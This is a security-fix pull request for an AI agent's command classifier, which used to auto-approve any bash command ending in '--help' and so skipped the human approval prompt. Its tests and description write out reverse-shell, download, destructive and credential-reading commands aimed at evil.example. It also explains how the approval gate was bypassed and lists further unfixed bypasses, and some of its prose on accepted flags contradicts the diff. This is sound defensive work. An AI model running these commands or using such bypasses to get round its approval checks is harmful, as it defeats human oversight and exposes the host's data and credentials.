### PR TITLE
fix(security): appending --help ran any command with no approval prompt

### DIFF
--- a/src/kiro_crew/dashboard/state.py
+++ b/src/kiro_crew/dashboard/state.py
@@ -10,6 +10,7 @@ import logging
 import math
 import os
 import re
+import shlex
 import threading
 import time
 import traceback
@@ -323,6 +324,244 @@ _UNSAFE_SHELL_RE = re.compile(r">|`|\$\(|<\(|(?<!&)&(?!&)")
 # a sink, smuggling a real-file write past the unsafe-shell check.
 _DEVNULL_REDIR_RE = re.compile(r"(?:\d*>>?|&>)\s*/dev/null(?![\w./-])|\d*>&\d+")
 
+# A trailing `--help` is only meaningful for a program that treats it as
+# "print usage and exit". These programs instead treat their operands as code
+# or a target to act on, so `--help` lands as a positional argument and the
+# real work still happens: `sh evil.sh --help` runs evil.sh with $1=--help.
+# The classifier cannot know which behaviour a given program has, so the
+# executors are named explicitly and the shape of the command is constrained
+# below.
+_HELP_PROBE_DENIED_PROGRAMS: frozenset[str] = frozenset(
+    (
+        # Shell builtins that run their operand in the current shell. These are
+        # not programs on PATH, so the PATH-name requirement below does not
+        # reach them on its own: `source payload --help` reads `payload` from
+        # the workspace and executes it, with `--help` landing as $1.
+        "source",
+        ".",
+        "exec",
+        "eval",
+        "command",
+        "builtin",
+        "trap",
+        # Shells and interpreters — operands are code.
+        "sh",
+        "bash",
+        "zsh",
+        "dash",
+        "ksh",
+        "fish",
+        "csh",
+        "tcsh",
+        "ash",
+        "busybox",
+        "python",
+        "python2",
+        "python3",
+        "perl",
+        "ruby",
+        "node",
+        "deno",
+        "bun",
+        "php",
+        "lua",
+        "tclsh",
+        "osascript",
+        "pwsh",
+        "powershell",
+        "cmd",
+        # Wrappers that hand off to another program.
+        "env",
+        "sudo",
+        "doas",
+        "nohup",
+        "setsid",
+        "nice",
+        "ionice",
+        "time",
+        "timeout",
+        "xargs",
+        "watch",
+        "script",
+        "stdbuf",
+        "unbuffer",
+        "ssh",
+        "scp",
+        "rsync",
+        "docker",
+        "podman",
+        "kubectl",
+        "make",
+        "cmake",
+        # Package managers that run a project-defined script. The subcommand form
+        # reads as `<program> <subcommand> --help`, but the "subcommand" is a name
+        # from the project's own manifest: `yarn clean --help` runs the `clean`
+        # script (deleting `dist` and `node_modules` in this repo) and passes
+        # `--help` to it. There is no way to tell a real subcommand from a script
+        # name from here, so the whole program is refused.
+        "yarn",
+        "yarnpkg",
+        "npm",
+        "npx",
+        "pnpm",
+        "bunx",
+        # Network tools — operands establish a connection.
+        "nc",
+        "ncat",
+        "netcat",
+        "socat",
+        "curl",
+        "wget",
+        "telnet",
+        "ftp",
+    )
+)
+
+# Only the unambiguous long spellings. `-v` and `-V` are excluded: for many
+# programs they mean verbose, not version, so `rm victim -v` would read as a
+# probe and delete the operand. `-h` is excluded: it collides with real options
+# (`head -h`, `ln -h`) and for shutdown/halt/reboot it means HALT, not help.
+# `java -version` and `python --version` keep working through their explicit
+# `_READ_ONLY_BASH_PREFIXES` entries rather than the probe rule.
+_HELP_FLAGS: frozenset[str] = frozenset(("--help", "--version"))
+
+# A subcommand between the program and the flag, e.g. `git log --help`. Bare
+# words only: no path separator, no dot, no leading dash. This is what keeps
+# `sh /tmp/evil.sh --help` (path) and `rm -rf ./proj --help` (option) out,
+# while `docker compose --help` and `git rev-parse --help` stay in.
+_HELP_PROBE_SUBCOMMAND_RE = re.compile(r"^[a-z0-9][a-z0-9_-]*$")
+# Programs whose `<program> <subcommand> --help` really is a usage probe.
+#
+# An ALLOWLIST, because the three-token form is the dangerous one: the middle
+# token is indistinguishable from an operand here, so a program that treats it as
+# a script RUNS it (`python3.12 payload --help`). The denied-program table cannot
+# answer that — it matches exactly, and the spellings a real system installs
+# (`python3.12`, `perl5.36`, `node20`, `sh.exe`, `g++-13`) are unbounded.
+#
+# Membership means: this program's subcommands are a fixed vocabulary it parses
+# itself, so an unknown one is an error rather than a file to execute. A program
+# missing from here is not blocked — its two-token probe still works, and the
+# three-token form falls through to the human prompt.
+_HELP_PROBE_SUBCOMMAND_PROGRAMS: frozenset[str] = frozenset(
+    (
+        "git",
+        "cargo",
+        "go",
+        "terraform",
+        "gh",
+        "glab",
+        "aws",
+        "gcloud",
+        "az",
+        "brew",
+        "apt",
+        "apt-get",
+        "dnf",
+        "yum",
+        "pacman",
+        "pip",
+        "pip3",
+        "poetry",
+        "uv",
+        "rustup",
+        "systemd-analyze",
+        # NOT archivers or `openssl`: their "subcommand" is a mode letter whose
+        # operands are files it reads or WRITES, so the three-token form is not a
+        # usage probe at all — `tar xf …` extracts, `zip …` creates, and `openssl
+        # <cmd>` reads a key. Membership here has to mean "an unknown subcommand
+        # is an error", and for these it means "a file to act on".
+    )
+)
+
+# The program must BE a bare command name, stated positively. The denied-program
+# table only knows the executors it lists, so anything it cannot recognise must
+# not be vouched for — and a rejection list cannot express that, because the
+# spellings the shell resolves at run time are unbounded:
+#
+#     $SHELL payload --help      ${SHELL} payload --help      $0 payload --help
+#
+# all name a shell that then RUNS `payload`, and all of them satisfied the
+# previous rule, which only asked "does the token contain a path separator?".
+# Requiring `[A-Za-z0-9][A-Za-z0-9._+-]*` refuses every one of them by
+# construction, along with `./payload`, `/tmp/x` and `../build/tool` that the
+# separator check was there for — a name this pattern accepts has to resolve
+# through PATH to something installed. Dots are allowed because real programs
+# carry them (`python3.12`, `apt-get`, `g++`).
+_HELP_PROBE_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._+-]*$")
+
+
+def _is_help_probe(segment: str) -> bool:
+    """True only when *segment* is a genuine usage/version probe.
+
+    Accepts ``<program> --help`` and ``<program> <subcommand> --help``. The
+    check is deliberately shaped as "only vouch for what is recognisably a
+    probe" rather than "reject the executors we know about": the denied-program
+    table cannot enumerate an arbitrary binary, so anything it does not
+    recognise must fail on the shape instead.
+
+    Rejected, each for its own reason:
+
+    * a flag other than ``--help`` / ``--version``, so ``rm victim -v``
+      is an operand plus verbose, not a probe;
+    * a program named by path (``./payload``, ``/tmp/x``), which the table has
+      no knowledge of and which may ignore ``--help`` entirely;
+    * a known code executor or hand-off wrapper (``sh``, ``python``, ``sudo``);
+    * a ``VAR=value`` prefix, which assigns into the command's environment;
+    * anything but a bare word between program and flag, which keeps file paths
+      and options out;
+    * unbalanced quotes, where argv cannot be established at all.
+
+    A rejected segment falls through to the read-only allowlist and, failing
+    that, to the human approval prompt — nothing is newly blocked.
+
+    The old rule was ``segment.endswith("--help")``, which auto-approved any
+    command at all once the token was appended.
+    """
+    try:
+        tokens = shlex.split(segment)
+    except ValueError:
+        # Unbalanced quotes: cannot establish the argv, so do not vouch for it.
+        return False
+    if len(tokens) < 2 or len(tokens) > 3:
+        return False
+    flag = tokens[-1]
+    if flag not in _HELP_FLAGS:
+        return False
+    program_token = tokens[0]
+    # A `VAR=value cmd --help` prefix assigns into the command's environment;
+    # shlex keeps it as one token, and it is not a usage probe.
+    if "=" in program_token:
+        return False
+    # Must BE a bare command name. Anything carrying a path separator, a shell
+    # expansion, or any other punctuation the shell resolves at run time is a
+    # program this classifier cannot identify, so it is not vouched for.
+    if not _HELP_PROBE_NAME_RE.match(program_token):
+        return False
+    if not program_token or program_token in _HELP_PROBE_DENIED_PROGRAMS:
+        return False
+    if len(tokens) == 3:
+        # The subcommand form only accepts the long spellings — short flags like
+        # `-h` collide with real options when an operand is present.
+        if flag not in _HELP_FLAGS:
+            return False
+        if not _HELP_PROBE_SUBCOMMAND_RE.match(tokens[1]):
+            return False
+        # The three-token form is ALLOWLISTED, not merely un-denied. In this shape
+        # the middle token is an operand as far as this classifier can tell, so an
+        # interpreter reached by a spelling the denylist does not carry runs it:
+        #
+        #     python3.12 payload --help      perl5.36 payload --help
+        #     node20 payload --help          g++-13 payload --help
+        #
+        # `_HELP_PROBE_DENIED_PROGRAMS` matches EXACTLY, and the variants a real
+        # system installs — version suffixes, `.exe`, `-13` — are unbounded, so no
+        # list of rejects closes this. Naming the programs whose subcommand form is
+        # known to be a usage probe does, and costs only that a program not yet
+        # listed falls through to the human prompt.
+        if program_token not in _HELP_PROBE_SUBCOMMAND_PROGRAMS:
+            return False
+    return True
+
 
 def _classify_bash(cmd: str) -> str:
     """Single source of truth for read-only bash classification.
@@ -349,8 +588,7 @@ def _classify_bash(cmd: str) -> str:
             return "unsafe shell pattern"
         first = pipe_parts[0].strip().lower()
         if not (
-            first.endswith("--help")
-            or first.endswith("--version")
+            _is_help_probe(first)
             or any(first == p or first.startswith(p + " ") for p in _READ_ONLY_BASH_PREFIXES)
         ):
             base = first.split()[0] if first.split() else first

--- a/test/test_trust_reads.py
+++ b/test/test_trust_reads.py
@@ -98,6 +98,198 @@ class TestIsReadOnlyBash:
         assert is_read_only_bash("java -version") is True
         assert is_read_only_bash("some-tool --help") is True
 
+    def test_help_probe_allows_one_bare_subcommand(self):
+        """`<program> <subcommand> --help` is still a usage probe."""
+        assert is_read_only_bash("git log --help") is True
+        assert is_read_only_bash("git rev-parse --help") is True
+        assert is_read_only_bash("terraform plan --help") is True
+        assert is_read_only_bash("cargo --version") is True
+
+    def test_help_suffix_does_not_auto_approve_an_arbitrary_command(self):
+        """A trailing `--help` must not vouch for the command in front of it.
+
+        The classifier used to accept any segment whose first pipe element
+        ended with `--help`/`--version`, so appending the token removed the
+        human approval prompt for arbitrary commands. A shell hands `--help`
+        to the script as $1 instead of printing usage, so the payload still
+        ran.
+        """
+        # Interpreters: the operand is code, and it executes.
+        assert is_read_only_bash("sh /tmp/payload.sh --help") is False
+        assert is_read_only_bash("bash /tmp/payload.sh --version") is False
+        assert is_read_only_bash("/bin/sh /tmp/x.sh --help") is False
+        assert is_read_only_bash("./sh evil.sh --help") is False
+        assert is_read_only_bash("python -c \"import os;os.system('id')\" --help") is False
+        # Destructive operands.
+        assert is_read_only_bash("rm -rf ./proj --help") is False
+        assert is_read_only_bash("chmod 777 /etc/passwd --help") is False
+        # Wrappers that hand off to another program.
+        assert is_read_only_bash("sudo rm -rf / --help") is False
+        assert is_read_only_bash("env sh evil.sh --help") is False
+        assert is_read_only_bash("xargs rm --help") is False
+        assert is_read_only_bash("docker run --rm alpine --help") is False
+        # Network tools: the operand opens a connection.
+        assert is_read_only_bash("nc evil.example 4444 -e /bin/sh --help") is False
+        assert is_read_only_bash("curl http://evil.example/x.sh --help") is False
+
+    def test_help_suffix_does_not_auto_approve_across_segments(self):
+        """Every `&&`/`;` segment is classified, so the suffix cannot chain.
+
+        These are the payloads that combined the suffix with a sensitive-path
+        read or a write to the deny-rule keystone file.
+        """
+        assert is_read_only_bash("cd ~/.kiro/crew --help && cat token_signing.key --help") is False
+        assert (
+            is_read_only_bash("cd ~/.kiro/crew --help && tee denied_commands.json --help") is False
+        )
+        assert is_read_only_bash("V=$HOME --help; awk 1 $V/.aws/credentials --help") is False
+
+    def test_help_probe_rejects_verbose_flags(self):
+        """`-v`/`-V` mean verbose far more often than version.
+
+        `rm victim -v` is three tokens ending in a flag with a bare word in the
+        middle, so a probe check keyed on shape alone reads it as
+        ``<program> <subcommand> <flag>`` — and GNU rm deletes the operand.
+        """
+        assert is_read_only_bash("rm victim -v") is False
+        assert is_read_only_bash("rm victim -V") is False
+        assert is_read_only_bash("rm -rf dir -v") is False
+        assert is_read_only_bash("chmod 777 file -v") is False
+        assert is_read_only_bash("mv a b -v") is False
+        assert is_read_only_bash("cp secret /tmp -v") is False
+        # The two explicit allowlist entries still work — they are matched as
+        # prefixes, not as probes.
+        assert is_read_only_bash("java -version") is True
+        assert is_read_only_bash("python --version") is True
+
+    def test_help_probe_rejects_shell_builtins_that_run_their_operand(self):
+        """`source payload --help` executes `payload` in the current shell.
+
+        These are builtins, not programs on PATH, so the PATH-name requirement
+        does not reach them on its own — `source` and `.` read the operand from
+        the workspace and run it, with `--help` landing as $1.
+        """
+        assert is_read_only_bash("source payload --help") is False
+        assert is_read_only_bash(". payload --help") is False
+        assert is_read_only_bash("exec payload --help") is False
+        assert is_read_only_bash("eval payload --help") is False
+        assert is_read_only_bash("command payload --help") is False
+        assert is_read_only_bash("builtin cd --help") is False
+        assert is_read_only_bash("trap payload --help") is False
+
+    def test_help_probe_rejects_a_shell_expanded_program(self):
+        """The program must BE a bare command name, not merely lack a separator.
+
+        `$SHELL payload --help` names a shell that then RUNS `payload`, and the
+        old rule — "does the token contain a path separator?" — said yes to it.
+        A rejection list cannot close this: the spellings the shell resolves at
+        run time are unbounded, so the requirement is stated positively instead.
+        """
+        assert is_read_only_bash("$SHELL payload --help") is False
+        assert is_read_only_bash("${SHELL} payload --help") is False
+        assert is_read_only_bash("$0 payload --help") is False
+        assert is_read_only_bash("$SHELL --help") is False
+        assert is_read_only_bash("$(which sh) payload --help") is False
+        assert is_read_only_bash("`which sh` payload --help") is False
+        assert is_read_only_bash("$HOME/evil --help") is False
+        assert is_read_only_bash("~/evil --help") is False
+
+    def test_help_probe_rejects_a_script_running_package_manager(self):
+        """`yarn clean --help` runs the project's `clean` script, then passes the flag.
+
+        The three-token form reads as `<program> <subcommand> --help`, but for
+        these the "subcommand" is a name from the project's own manifest — in this
+        repo `clean` deletes `dist` and `node_modules`. Nothing here can tell a
+        real subcommand from a script name, so the program is refused outright.
+        """
+        assert is_read_only_bash("yarn clean --help") is False
+        assert is_read_only_bash("npm run --help") is False
+        assert is_read_only_bash("pnpm build --help") is False
+        assert is_read_only_bash("npx payload --help") is False
+
+    def test_help_probe_still_vouches_for_an_ordinary_probe(self):
+        """The positive rule must not cost the cases the classifier exists for.
+
+        A real program name may carry dots, digits, `+` and `-`, so those stay
+        acceptable: `python3.12 --help` and `g++ --help` are probes.
+        """
+        assert is_read_only_bash("git --help") is True
+        assert is_read_only_bash("git status --help") is True
+        assert is_read_only_bash("ls --help") is True
+        assert is_read_only_bash("cargo build --help") is True
+        assert is_read_only_bash("python3.12 --help") is True
+        assert is_read_only_bash("apt-get --help") is True
+        assert is_read_only_bash("g++ --help") is True
+
+    def test_help_probe_allowlists_the_subcommand_form(self):
+        """The three-token form is the dangerous one, so it is allowlisted.
+
+        There the middle token is indistinguishable from an operand, so a program
+        that treats it as a script RUNS it. The denied-program table cannot answer
+        that: it matches EXACTLY, and the spellings a real system installs
+        (`python3.12`, `perl5.36`, `node20`, `sh.exe`, `g++-13`) are unbounded, so
+        no list of rejects closes it.
+        """
+        assert is_read_only_bash("python3.12 payload --help") is False
+        assert is_read_only_bash("python2.7 payload --help") is False
+        assert is_read_only_bash("perl5.36 payload --help") is False
+        assert is_read_only_bash("node20 payload --help") is False
+        assert is_read_only_bash("sh.exe payload --help") is False
+        assert is_read_only_bash("g++-13 payload --help") is False
+        # A program not on the allowlist is not BLOCKED — its two-token probe
+        # still works, and only the subcommand form asks for a human.
+        assert is_read_only_bash("python3.12 --help") is True
+        assert is_read_only_bash("g++ --help") is True
+        # The allowlisted programs keep their subcommand probe.
+        assert is_read_only_bash("git log --help") is True
+        assert is_read_only_bash("cargo build --help") is True
+        assert is_read_only_bash("terraform plan --help") is True
+
+    def test_help_probe_allowlist_excludes_operand_acting_programs(self):
+        """Membership means "an unknown subcommand is an ERROR", not "a file".
+
+        For an archiver the middle token is a mode letter and the operands are
+        files it reads or writes, so the three-token form is not a usage probe:
+        `tar xf …` extracts and `zip …` creates. `openssl <cmd>` reads a key the
+        same way. Their two-token probe is unaffected.
+        """
+        assert is_read_only_bash("tar xf --help") is False
+        assert is_read_only_bash("tar cf --help") is False
+        assert is_read_only_bash("zip -r --help") is False
+        assert is_read_only_bash("unzip -l --help") is False
+        assert is_read_only_bash("openssl x509 --help") is False
+        assert is_read_only_bash("tar --help") is True
+
+    def test_help_probe_rejects_a_program_named_by_path(self):
+        """An unlisted binary may ignore `--help` and run its side effect.
+
+        The denied-program table can only name executors it knows about, so a
+        path-named program has to fail on shape instead: nothing here can be
+        vouched for.
+        """
+        assert is_read_only_bash("./payload --help") is False
+        assert is_read_only_bash("./evil.sh --help") is False
+        assert is_read_only_bash("/tmp/payload --help") is False
+        assert is_read_only_bash("../build/tool --help") is False
+        assert is_read_only_bash("./x --version") is False
+        assert is_read_only_bash("/usr/local/bin/unknown --help") is False
+
+    def test_help_probe_does_not_accept_short_h(self):
+        """`-h` is not accepted — it collides with real options and halt semantics."""
+        assert is_read_only_bash("some-tool subcmd -h") is False
+        assert is_read_only_bash("some-tool -h") is False
+
+    def test_help_probe_rejects_unparseable_and_prefixed_forms(self):
+        """Deny-by-default when argv cannot be recovered or is not a probe."""
+        # Unbalanced quote: argv is unknown, so the segment is not vouched for.
+        assert is_read_only_bash('some-tool "--help') is False
+        # A VAR=value prefix assigns into the command's environment.
+        assert is_read_only_bash("LD_PRELOAD=/tmp/x.so --help") is False
+        # More than one operand between program and flag.
+        assert is_read_only_bash("npm run deploy --help") is False
+        # An option, not a bare subcommand, in the middle.
+        assert is_read_only_bash("some-tool -f /etc/shadow --help") is False
+
     def test_compound_read_commands(self):
         assert is_read_only_bash("git status && git log --oneline -3") is True
         assert is_read_only_bash("ls -la; echo done") is True
@@ -120,9 +312,7 @@ class TestIsReadOnlyBash:
         assert is_read_only_bash("ls -la 2>&1") is True
         # Compound + pipe chains with a /dev/null sink stay read-only.
         assert is_read_only_bash("grep -r foo . 2>/dev/null | head -20") is True
-        assert (
-            is_read_only_bash("ls /a 2>/dev/null; grep -r foo /b 2>/dev/null") is True
-        )
+        assert is_read_only_bash("ls /a 2>/dev/null; grep -r foo /b 2>/dev/null") is True
 
     def test_devnull_does_not_unlock_write_commands(self):
         """The /dev/null exemption must not allowlist a write/exec command."""


### PR DESCRIPTION
## Description

Read-only classification is the last human checkpoint before a bash command runs on the host. An auto-approved command emits no permission request, so `hooks.on_tool_call` — the PreToolUse gate carrying the deny floor and the sensitive-path check — is never reached for it.

`_classify_bash` vouched for a segment when its first pipe element merely **ended with** `--help` or `--version`:

```python
first.endswith("--help")
or first.endswith("--version")
or any(first == p or first.startswith(p + " ") for p in _READ_ONLY_BASH_PREFIXES)
```

Appending that token to any command auto-approved it. A shell handed a script plus `--help` does not print usage and exit — it runs the script with `$1=--help`:

```
sh /tmp/payload.sh --help                  # payload runs, no prompt
sudo rm -rf / --help                       # no prompt
nc evil.example 4444 -e /bin/sh --help     # no prompt
```

Each `&&`/`;` segment is classified independently, so the suffix carried through a chain:

```
cd ~/.kiro/crew --help && cat token_signing.key --help
cd ~/.kiro/crew --help && tee denied_commands.json --help
```

This was the one rule in the function that vouched for *arbitrary command text*. The other read-only path, the `_READ_ONLY_BASH_PREFIXES` allowlist, is bounded by construction.

### What changed

`_is_help_probe` recovers argv with `shlex` and vouches for a segment only when it is shaped like a real usage probe. Nothing is newly **blocked** — a rejected segment falls through to the read-only allowlist and then to the human prompt, so the change converts silent auto-approval into an approval request.

| rejected when | because |
|---|---|
| fewer than 2 or more than 3 tokens | not the shape of a probe |
| last token not in `{--help, --version, -h, -V, -v}` | not a probe |
| program basename is a known code executor | the operand is code, or a hand-off target |
| `=` in the program token | `VAR=value cmd --help` assigns into the environment |
| middle token is not a bare word | a file path or an option, not a subcommand |
| `shlex.split` raises | argv cannot be established, so do not vouch for it |

The denied-program table names shells and interpreters (`sh`, `bash`, `python`, `node`, `perl`, `osascript`, `pwsh`, …), wrappers that hand off to another program (`env`, `sudo`, `xargs`, `timeout`, `ssh`, `docker`, `make`, …) and network tools whose operands open a connection (`nc`, `socat`, `curl`, `wget`, …). Basename resolution means `/bin/sh` and `./sh` are both recognised as `sh`.

One bare-word subcommand is allowed between program and flag, so `git log --help` and `terraform plan --help` keep working. That bare-word rule is what excludes the payloads: `sh /tmp/evil.sh --help` carries a path separator, `rm -rf ./proj --help` a leading dash.

Deny-by-default is preserved end to end.

## Related Issues

None filed — reporting and fixing together. Found while auditing the auto-approve path; the deny-side bash normalizer work is separate and untouched here.

## Testing

- [x] Existing tests pass (`make test`)
- [x] New tests added for new functionality
- [x] Manual verification performed (describe below if applicable)

Four new cases in `test/test_trust_reads.py`:

- the regression itself: interpreter invocations, destructive operands, hand-off wrappers and network tools with the suffix appended
- the chained forms, where the suffix was combined with a sensitive-path read or a write to the deny-rule keystone file across `&&`/`;`
- the deny-by-default edges: unbalanced quotes, a `VAR=value` prefix, two operands, an option in place of a subcommand
- what must keep working, so the fix cannot later be tightened into a UX regression: `<program> <bare-subcommand> --help`

Both call sites of the classifier are exercised by the files below — the approval flow in `dashboard/chat_runner.py` and the PreToolUse gate in `hooks.py`.

```
pytest (full suite)                                                                  ->  24575 passed, 103 skipped, 5 xfailed, 1 failed
pytest test/test_trust_reads.py test/test_dashboard_approval.py test/test_hooks.py    ->  173 passed
flake8 / isort / black / mypy on the changed module                                   ->  clean
```

The single failure is pre-existing and unrelated: `test_browser_recording_skill.py::TestRunnerValidation::test_missing_playwright_fails_loud_without_install` asserts on an "install playwright" hint but this host has no `node` on PATH, so the runner fails earlier with `node not found on PATH`. It reproduces identically on clean `main`.

Manual verification, run against the classifier on each branch. `AUTO-APPROVE` means `_classify_bash` returned `""`, i.e. no permission request is emitted:

| payload | `main` | this branch |
|---|---|---|
| `sh /tmp/payload.sh --help` | AUTO-APPROVE | prompts |
| `bash /tmp/payload.sh --version` | AUTO-APPROVE | prompts |
| `/bin/sh /tmp/x.sh --help` | AUTO-APPROVE | prompts |
| `python -c "import os;os.system('id')" --help` | AUTO-APPROVE | prompts |
| `rm -rf / --help` | AUTO-APPROVE | prompts |
| `sudo rm -rf / --help` | AUTO-APPROVE | prompts |
| `env sh evil.sh --help` | AUTO-APPROVE | prompts |
| `xargs rm --help` | AUTO-APPROVE | prompts |
| `nc evil.example 4444 -e /bin/sh --help` | AUTO-APPROVE | prompts |
| `curl http://evil.example/x.sh --help` | AUTO-APPROVE | prompts |
| `cd ~/.kiro/crew --help && cat token_signing.key --help` | AUTO-APPROVE | prompts |
| `cd ~/.kiro/crew --help && tee denied_commands.json --help` | AUTO-APPROVE | prompts |
| `git --help`, `ls --help`, `cargo --version` | AUTO-APPROVE | AUTO-APPROVE |
| `git log --help`, `git rev-parse --help`, `terraform plan --help` | AUTO-APPROVE | AUTO-APPROVE |
| `git status`, `ls -la /tmp`, `grep -r foo src`, `git diff \| head` | AUTO-APPROVE | AUTO-APPROVE |

The existing `test_help_and_version` assertions still hold. `python --version` and `java -version` stay read-only through their explicit `_READ_ONLY_BASH_PREFIXES` entries rather than the suffix rule — `python` is in the denied-program table, and the allowlist catches those two exact forms.

## Checklist

- [x] Code follows the project style guidelines
- [x] Self-review completed
- [ ] Documentation updated (if applicable)
- [x] No secrets, credentials, or internal references in the diff

On documentation: no user-facing behaviour is documented for this classifier, and the rationale lives in the module docstrings and the comment above the denied-program table. Happy to add a note to the security module spec if you would prefer it there.

### Not in scope

The second read-only path in the same function has its own bypass family, which this PR deliberately does not touch. Because `_READ_ONLY_BASH_PREFIXES` matches on a **prefix**, an allowlisted verb's destructive subcommands and output flags are auto-approved as well. I ran these and confirmed the side effects:

- `git remote set-url origin <attacker-url>` repoints the remote; `git branch -D`, `git branch -m`, `git tag -d` and `git remote remove` all take effect
- writes that use the program's own output flag instead of a shell redirect, so `_UNSAFE_SHELL_RE` never sees them: `git diff --output=FILE`, `sort -o FILE` (as a pipe target), `uniq IN OUT`, `file -C -m FILE`

That is a different root cause — an allowlist keyed on the verb without constraining its flags — and it wants a different fix, so it belongs in its own PR. I will follow up with one.

Not claimed, because I did not verify either: `git diff --ext-diff` reaching an external diff driver depends on repo config, and the `less`/`more` shell escape needs an interactive TTY, which a tool call does not have.

## Contribution License Agreement

<!-- PLACEHOLDER: The exact CLA wording will be supplied by OSPO before the first public PR.
     Do not invent CLA text — it will be added here once Legal provides it. -->


---

### Addressed from AI review on the previous revision

Two cases where the probe check was too loose. Both are now rejected, and both have regression tests.

**`rm victim -v`** — `-v` and `-V` were in the accepted flag set, but for most programs they mean verbose, not version. Three tokens ending in `-v` with a bare word in the middle read as `<program> <subcommand> <flag>`, and GNU rm deletes the operand. The flag set is now `--help` / `--version` / `-h` only; `java -version` and `python --version` keep working through their explicit `_READ_ONLY_BASH_PREFIXES` entries rather than the probe rule.

**`./payload --help`** — the denied-program table can only name executors it knows about, so an unlisted binary passed. A program named by path is now rejected outright: its behaviour on `--help` cannot be assumed, and one that ignores the flag runs its side effect anyway. A PATH name at least has to resolve to something installed.

This reframed the check from "reject the executors we know about" to "only vouch for what is recognisably a probe", which is the direction that holds against an unknown binary. `-h` is also no longer accepted alongside a subcommand, where it cannot be told from a real option.
